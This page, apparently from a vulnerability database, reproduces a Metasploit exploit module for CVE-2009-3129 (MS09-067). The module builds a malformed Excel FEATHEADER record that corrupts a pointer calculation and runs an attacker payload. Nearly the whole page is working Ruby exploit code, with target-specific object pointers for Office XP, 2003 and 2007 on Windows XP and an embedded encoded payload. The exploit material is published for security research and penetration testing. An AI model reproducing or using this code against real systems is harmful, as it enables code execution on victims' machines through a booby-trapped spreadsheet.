Lucene search
K

MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability

🗓️ 12 Feb 2010 20:52:41Reported by Sean Larsson, jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 25 Views

MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability. Exploits pointer offset calculation vulnerability in Shared Feature record, leading to arbitrary code executio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/ole'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability',
      'Description'    => %q{
            This module exploits a vulnerability in the handling of the FEATHEADER record
          by Microsoft Excel. Revisions of Office XP and later prior to the release of the
          MS09-067 bulletin are vulnerable.

          When processing a FEATHEADER (Shared Feature) record, Microsoft used a data
          structure from the file to calculate a pointer offset without doing proper
          validation. Attacker supplied data is then used to calculate the location of an
          object, and in turn a virtual function call. This results in arbitrary code
          execution.

          NOTE: On some versions of Office, the user will need to dismiss a warning dialog
          prior to the payload executing.
        },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sean Larsson',  # original discovery
          'jduck'
        ],
      'References'     =>
        [
          [ 'CVE','2009-3129' ],
          [ 'OSVDB', '59860' ],
          [ 'MSB', 'MS09-067' ],
          [ 'BID', '36945' ],
          [ 'ZDI', '09-083' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
          'DisableNops'   => true # no need
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          #
          # To find new targets, generate the file using the debug target and execute
          # the following in windbg:
          #
          # 0:000> s -b 0 L?-1 04 00 00 00 ee ff c0 da
          #
          # Use the largest number + 9 (should be in the 0x30xxxxxx range)
          #

          # Office v10.6501.6626, excel.exe v10.0.6501.0
          [ 'Microsoft Office 2002 (XP) SP3 base English on Windows XP SP3 English',
            { 'ObjPtr' => 0x307ddd10 }
          ],

          # Office v10.6854.6845, excel.exe v10.0.6854.0
          [ 'Microsoft Office 2002 (XP) SP3 w/kb969680 English on Windows XP SP3 English',
            { 'ObjPtr' => 0x308082d0 }
          ],

          # Office v11.5612.5606, excel.exe v11.0.5612.0
          [ 'Microsoft Office 2003 SP0 English on Windows XP SP3 English',
            { 'ObjPtr' => 0x3085d430 }
          ],

          # Office v12.0.6425.1000, excel.exe v12.0.6425.1000
          [ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',
            { 'ObjPtr' => 0x30f69018 }
          ],

          # crash on a deref path to heaven.
          [ 'Crash Target for Debugging',
            { 'ObjPtr' => 0xdac0ffee }
          ]
        ],
      'DisclosureDate' => '2009-11-10'))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.xls']),
        OptString.new('OUTPUTPATH', [ true, 'The output path to use.', Msf::Config.local_directory]),
      ])
  end

  def add_record(tag, data=nil)
    ret = ""
    ret << Rex::OLE::Util.pack16(tag)
    data ||= ''
    ret << Rex::OLE::Util.pack16(data.length)
    ret << data
    ret
  end

  def exploit

    # build the Workbook stream
    ptr1 = target['ObjPtr']
    ptr2 = ptr1 + 4
    ptr3 = ptr2 + 4
    ptr4 = ptr3 + 4

    bofdata = ""
    bofdata << Rex::OLE::Util.pack16(0x0600)
    bofdata << Rex::OLE::Util.pack16(0x0005)
    bofdata << Rex::OLE::Util.pack16(0x1faa)
    bofdata << Rex::OLE::Util.pack16(0x07cd)
    bofdata << Rex::OLE::Util.pack32(0x000100c1)
    bofdata << Rex::OLE::Util.pack32(0x00000406)

    feathdr = ""
    feathdr << Rex::OLE::Util.pack16(0x0867) # frt
    feathdr << "\x00" * (10)
    feathdr << Rex::OLE::Util.pack16(0x0004) # isf
    feathdr << "\x01" # reserved
    feathdr << Rex::OLE::Util.pack32(0x00000004) # cbHdrData
    feathdr << [ptr1].pack('V')
    feathdr << rand_text_alphanumeric(1) # alignment
    feathdr << [ptr2].pack('V')
    feathdr << [ptr3 - 0x28].pack('V')
    feathdr << [ptr4].pack('V')
    #feathdr << "\xcc"
    feathdr << payload.encoded

    content = ""
    content << add_record(0x0809, bofdata)
    content << add_record(0x0867, feathdr)
    content << add_record(0x000a)

    print_status("Creating Excel spreadsheet ...")

    out = File.join(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
    stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
    if (not stg)
      fail_with(Failure::Unknown, 'Unable to create output file')
    end
    stm = stg.create_stream("Workbook")
    if (not stm)
      fail_with(Failure::Unknown, 'Unable to create workbook stream')
    end
    stm << content
    stm.close
    stg.close

    print_status("Generated output file #{out}")

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation